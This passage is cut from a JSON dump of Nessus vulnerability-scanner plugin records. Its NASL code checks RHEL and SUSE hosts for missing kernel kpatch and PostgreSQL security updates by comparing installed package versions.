package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module postgresql:10');\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + 
redhat_report_repo_caveat();\n else extra = rpm_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'postgresql / postgresql-contrib / postgresql-docs / postgresql-plperl / etc');\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:35:40", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0189 advisory.\n\n - kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c\n (CVE-2020-25211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 6.0, "vector": "AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "RHEL 8 : kpatch-patch (RHSA-2021:0189)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25211"], "modified": "2021-01-21T00:00:00", "cpe": ["cpe:/o:redhat:rhel_eus:8.1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_13_2", "cpe:/o:redhat:rhel_e4s:8.1::baseos", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_8_1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_34_1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_27_1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_24_2", "cpe:/o:redhat:rhel_e4s:8.1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_32_1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_20_1", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:rhel_eus:8.1::baseos", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_5_1"], "id": "REDHAT-RHSA-2021-0189.NASL", "href": "https://www.tenable.com/plugins/nessus/145242", 
"sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0189. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145242);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-25211\");\n script_xref(name:\"RHSA\", value:\"2021:0189\");\n\n script_name(english:\"RHEL 8 : kpatch-patch (RHSA-2021:0189)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0189 advisory.\n\n - kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c\n (CVE-2020-25211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/119.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25211\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0189\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1877571\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25211\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_13_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_20_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_24_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_27_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_32_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_34_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_8_1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\ninclude('ksplice.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.1')) audit(AUDIT_OS_NOT, 'Red Hat 8.1', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_e4s_8_1_baseos': [\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_baseos': [\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms',\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-rpms',\n 'rhel-8-for-aarch64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms__8_DOT_1',\n 
'rhel-8-for-s390x-baseos-eus-debug-rpms',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-rpms',\n 'rhel-8-for-s390x-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-source-rpms',\n 'rhel-8-for-s390x-baseos-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-rpms',\n 'rhel-8-for-x86_64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms__8_DOT_1'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0189');\n}\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n cve_list = make_list('CVE-2020-25211');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for RHSA-2021:0189');\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\npkgs = [\n {'rpm_prefix': 'kernel-4.18.0-147.13.2', 'reference':'kpatch-patch-4_18_0-147_13_2-1-6.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.20.1', 'reference':'kpatch-patch-4_18_0-147_20_1-1-5.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.24.2', 
'reference':'kpatch-patch-4_18_0-147_24_2-1-3.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.27.1', 'reference':'kpatch-patch-4_18_0-147_27_1-1-3.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.32.1', 'reference':'kpatch-patch-4_18_0-147_32_1-1-1.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.34.1', 'reference':'kpatch-patch-4_18_0-147_34_1-1-1.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.5.1', 'reference':'kpatch-patch-4_18_0-147_5_1-1-10.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.8.1', 'reference':'kpatch-patch-4_18_0-147_8_1-1-8.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = 
package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release && rpm_prefix) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj))) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kpatch-patch-4_18_0-147_13_2 / kpatch-patch-4_18_0-147_20_1 / etc');\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-22T14:37:05", "description": "This update for postgresql, postgresql13 fixes the following issues :\n\nThis update ships postgresql13.\n\nUpgrade to version 13.1 :\n\nCVE-2020-25695, bsc#1178666: Block DECLARE CURSOR ... 
WITH HOLD and\nfiring of deferred triggers within index expressions and materialized\nview queries.\n\nCVE-2020-25694, bsc#1178667: a) Fix usage of complex connection-string\nparameters in pg_dump, pg_restore, clusterdb, reindexdb, and vacuumdb.\nb) When psql's \\connect command re-uses connection parameters, ensure\nthat all non-overridden parameters from a previous connection string\nare re-used.\n\nCVE-2020-25696, bsc#1178668: Prevent psql's \\gset command from\nmodifying specially-treated variables.\n\nFix recently-added timetz test case so it works when the USA is not\nobserving daylight savings time. (obsoletes postgresql-timetz.patch)\n\nhttps://www.postgresql.org/about/news/2111/\n\nhttps://www.postgresql.org/docs/13/release-13-1.html\n\nInitial packaging of PostgreSQL 13 :\n\nhttps://www.postgresql.org/about/news/2077/\n\nhttps://www.postgresql.org/docs/13/release-13.html\n\nbsc#1178961: %ghost the symlinks to pg_config and ecpg.\n\nChanges in postgresql wrapper package :\n\nBump major version to 13.\n\nWe also transfer PostgreSQL 9.4.26 to the new package layout in\nSLE12-SP2 and newer. Reflect this in the conflict with postgresql94.\n\nAlso conflict with PostgreSQL versions before 9.\n\nConflicting with older versions is not limited to SLE.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 1, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : postgresql, postgresql13 (SUSE-SU-2021:0175-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25695", "CVE-2020-25694", "CVE-2020-25696"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:postgresql13-pltcl", "p-cpe:/a:novell:suse_linux:libpq5-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-server-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-plperl-debuginfo", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:postgresql13-devel-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-pltcl-debuginfo", "p-cpe:/a:novell:suse_linux:libpq5", "p-cpe:/a:novell:suse_linux:postgresql13-plpython", "p-cpe:/a:novell:suse_linux:postgresql13-contrib-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-server", "p-cpe:/a:novell:suse_linux:postgresql13", "p-cpe:/a:novell:suse_linux:postgresql13-devel", "p-cpe:/a:novell:suse_linux:postgresql13-test", "p-cpe:/a:novell:suse_linux:postgresql13-server-devel", "p-cpe:/a:novell:suse_linux:libecpg6", "p-cpe:/a:novell:suse_linux:libecpg6-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-debugsource", "p-cpe:/a:novell:suse_linux:postgresql13-plpython-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-contrib", "p-cpe:/a:novell:suse_linux:postgresql13-plperl", "p-cpe:/a:novell:suse_linux:libpq5-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-server-devel-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-debuginfo"], "id": "SUSE_SU-2021-0175-1.NASL", "href": "https://www.tenable.com/plugins/nessus/145239", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory 
SUSE-SU-2021:0175-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145239);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-25694\", \"CVE-2020-25695\", \"CVE-2020-25696\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : postgresql, postgresql13 (SUSE-SU-2021:0175-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for postgresql, postgresql13 fixes the following issues :\n\nThis update ships postgresql13.\n\nUpgrade to version 13.1 :\n\nCVE-2020-25695, bsc#1178666: Block DECLARE CURSOR ... WITH HOLD and\nfiring of deferred triggers within index expressions and materialized\nview queries.\n\nCVE-2020-25694, bsc#1178667: a) Fix usage of complex connection-string\nparameters in pg_dump, pg_restore, clusterdb, reindexdb, and vacuumdb.\nb) When psql's \\connect command re-uses connection parameters, ensure\nthat all non-overridden parameters from a previous connection string\nare re-used.\n\nCVE-2020-25696, bsc#1178668: Prevent psql's \\gset command from\nmodifying specially-treated variables.\n\nFix recently-added timetz test case so it works when the USA is not\nobserving daylight savings time. 
(obsoletes postgresql-timetz.patch)\n\nhttps://www.postgresql.org/about/news/2111/\n\nhttps://www.postgresql.org/docs/13/release-13-1.html\n\nInitial packaging of PostgreSQL 13 :\n\nhttps://www.postgresql.org/about/news/2077/\n\nhttps://www.postgresql.org/docs/13/release-13.html\n\nbsc#1178961: %ghost the symlinks to pg_config and ecpg.\n\nChanges in postgresql wrapper package :\n\nBump major version to 13.\n\nWe also transfer PostgreSQL 9.4.26 to the new package layout in\nSLE12-SP2 and newer. Reflect this in the conflict with postgresql94.\n\nAlso conflict with PostgreSQL versions before 9.\n\nConflicting with older versions is not limited to SLE.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178668\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178961\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/about/news/2077/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/about/news/2111/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/docs/13/release-13-1.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/docs/13/release-13.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-25694/\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-25695/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-25696/\"\n );\n # https://www.suse.com/support/update/announcement/2021/suse-su-20210175-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b7248f14\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Server-Applications-15-SP2-2021-175=1\n\nSUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Packagehub-Subpackages-15-SP2-2021-175=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-175=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libecpg6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libecpg6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpq5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpq5-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpq5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-contrib\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:postgresql13-contrib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-plperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-plperl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-plpython\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-plpython-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-pltcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-pltcl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-server-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! 
